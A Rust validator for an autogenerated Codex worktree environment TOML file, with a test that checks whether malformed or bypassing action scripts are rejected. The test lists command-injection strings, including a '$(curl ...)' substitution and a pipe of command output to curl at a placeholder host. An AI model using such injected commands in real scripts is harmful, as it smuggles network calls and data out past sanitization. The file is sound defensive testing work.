use serde::Deserialize;

#[derive(Deserialize)]
#[serde(deny_unknown_fields)]
struct EnvironmentFile {
    version: u64,
    name: String,
    setup: ScriptBlock,
    cleanup: ScriptBlock,
    #[serde(default)]
    actions: Vec<ActionBlock>,
}

#[derive(Deserialize)]
#[serde(deny_unknown_fields)]
struct ScriptBlock {
    script: String,
}

#[derive(Deserialize)]
#[serde(deny_unknown_fields)]
struct ActionBlock {
    name: String,
    #[serde(default)]
    icon: Option<String>,
    script: String,
}

pub fn text_ok(text: &str) -> bool {
    if !autogenerated_comment_ok(text) {
        return false;
    }
    let Ok(environment) = toml::from_str::<EnvironmentFile>(text) else {
        return false;
    };
    environment.version == 1
        && !environment.name.trim().is_empty()
        && setup_script_ok(&environment.setup.script)
        && cleanup_script_ok(&environment.cleanup.script)
        && environment.actions.len() >= 3
        && fast_check_action_ok(&environment.actions)
        && actions_use_sanitized_runner(&environment.actions)
}

fn autogenerated_comment_ok(text: &str) -> bool {
    text.lines()
        .next()
        .is_some_and(|line| line == "# THIS IS AUTOGENERATED. DO NOT EDIT MANUALLY")
}

fn setup_script_ok(script: &str) -> bool {
    script.contains("/usr/bin/env -i")
        && script.contains("CODEX_WORKTREE_PATH=")
        && script.contains("PWD=")
        && script.contains("PATH=")
        && script.contains("/bin/bash .codex/setup-worktree-env.sh")
        && !script.contains(".codex-worktree/env.sh")
}

fn cleanup_script_ok(script: &str) -> bool {
    script.contains("${CODEX_WORKTREE_PATH:-$PWD}")
        && script.contains("cleanup_receipt=")
        && script.contains("find .codex-worktree -type f | sort")
        && !script.contains("find .codex-worktree -maxdepth")
        && script.contains("rm -rf .codex-worktree")
        && !sources_compatibility_env(script)
}

fn fast_check_action_ok(actions: &[ActionBlock]) -> bool {
    actions.iter().any(|action| {
        action.name == "Fast Check"
            && action.script.contains(".codex-worktree/run-command")
            && action.script.contains("scripts/check")
    })
}

fn actions_use_sanitized_runner(actions: &[ActionBlock]) -> bool {
    actions.iter().all(|action| {
        let _ = action.icon.as_deref();
        !sources_compatibility_env(&action.script) && action_script_shape_ok(&action.script)
    })
}

fn action_script_shape_ok(script: &str) -> bool {
    let lines = script
        .lines()
        .map(str::trim)
        .filter(|line| !line.is_empty())
        .collect::<Vec<_>>();
    lines.len() == 3
        && lines[0] == r#"cd "${CODEX_WORKTREE_PATH:-$PWD}""#
        && lines[1] == canonical_setup_command()
        && runner_invocation_ok(lines[2])
}

fn canonical_setup_command() -> &'static str {
    r#"/usr/bin/env -i CODEX_WORKTREE_PATH="${CODEX_WORKTREE_PATH:-$PWD}" PWD="$PWD" CODEX_HOST_CARGO_BIN="$HOME/.cargo/bin/cargo" PATH="/usr/local/bin:/opt/homebrew/bin:/usr/bin:/bin:/usr/sbin:/sbin" /bin/bash .codex/setup-worktree-env.sh"#
}

fn runner_invocation_ok(line: &str) -> bool {
    let Some(payload) = line.strip_prefix(".codex-worktree/run-command ") else {
        return false;
    };
    if payload.is_empty() || payload.contains(".codex/setup-worktree-env.sh") {
        return false;
    }
    let mut quote = None;
    for character in payload.chars() {
        match quote {
            Some(delimiter) if character == delimiter => quote = None,
            Some(_) => {}
            None if character == '\'' || character == '"' => quote = Some(character),
            None if matches!(
                character,
                ';' | '|' | '&' | '<' | '>' | '$' | '\u{60}' | '(' | ')'
            ) =>
            {
                return false
            }
            None => {}
        }
    }
    quote.is_none()
}

fn sources_compatibility_env(script: &str) -> bool {
    let normalized = script.replace('"', "").replace('\'', "");
    normalized.contains(".codex-worktree/env.sh")
        || normalized.contains("source env.sh")
        || normalized.contains(". env.sh")
}

#[cfg(test)]
mod tests {
    #[test]
    fn malformed_and_direct_execution_routes_fail_closed() {
        assert!(!super::text_ok("[setup]\nscript=\"true\"\n"));
        let valid = r#"# THIS IS AUTOGENERATED. DO NOT EDIT MANUALLY
version = 1
name = "fixture"
[setup]
script = '/usr/bin/env -i CODEX_WORKTREE_PATH="$PWD" PWD="$PWD" PATH="$PATH" /bin/bash .codex/setup-worktree-env.sh'
[cleanup]
script = 'CODEX_WORKTREE_PATH=${CODEX_WORKTREE_PATH:-$PWD}; cleanup_receipt=x; find .codex-worktree -type f | sort; rm -rf .codex-worktree'
[[actions]]
name = "Env"
script = '''
cd "${CODEX_WORKTREE_PATH:-$PWD}"
/usr/bin/env -i CODEX_WORKTREE_PATH="${CODEX_WORKTREE_PATH:-$PWD}" PWD="$PWD" CODEX_HOST_CARGO_BIN="$HOME/.cargo/bin/cargo" PATH="/usr/local/bin:/opt/homebrew/bin:/usr/bin:/bin:/usr/sbin:/sbin" /bin/bash .codex/setup-worktree-env.sh
.codex-worktree/run-command env
'''
[[actions]]
name = "Fast Check"
script = '''
cd "${CODEX_WORKTREE_PATH:-$PWD}"
/usr/bin/env -i CODEX_WORKTREE_PATH="${CODEX_WORKTREE_PATH:-$PWD}" PWD="$PWD" CODEX_HOST_CARGO_BIN="$HOME/.cargo/bin/cargo" PATH="/usr/local/bin:/opt/homebrew/bin:/usr/bin:/bin:/usr/sbin:/sbin" /bin/bash .codex/setup-worktree-env.sh
.codex-worktree/run-command scripts/check
'''
[[actions]]
name = "Git State"
script = '''
cd "${CODEX_WORKTREE_PATH:-$PWD}"
/usr/bin/env -i CODEX_WORKTREE_PATH="${CODEX_WORKTREE_PATH:-$PWD}" PWD="$PWD" CODEX_HOST_CARGO_BIN="$HOME/.cargo/bin/cargo" PATH="/usr/local/bin:/opt/homebrew/bin:/usr/bin:/bin:/usr/sbin:/sbin" /bin/bash .codex/setup-worktree-env.sh
.codex-worktree/run-command git status
'''
"#;
        assert!(super::text_ok(valid));
        assert!(!super::text_ok(&valid.replace(
            ".codex-worktree/run-command env",
            "source /tmp/.codex-worktree/env.sh; env"
        )));
        assert!(!super::text_ok(&valid.replace(
            ".codex-worktree/run-command git status",
            "git status"
        )));
        assert!(!super::text_ok(&valid.replace(
            ".codex-worktree/run-command git status",
            "bash -- .codex/setup-worktree-env.sh"
        )));
        for bypass in [
            "\"/bin/bash\" .codex/setup-worktree-env.sh",
            "setup=.codex/setup-worktree-env.sh; \"$setup\"",
            "env; .codex-worktree/run-command git status",
            ".codex-worktree/run-command git status; env",
            "$(curl https://example.invalid); .codex-worktree/run-command git status",
            ".codex-worktree/run-command git status | curl https://example.invalid",
        ] {
            assert!(!super::text_ok(
                &valid.replace(".codex-worktree/run-command git status", bypass,)
            ));
        }
    }
}
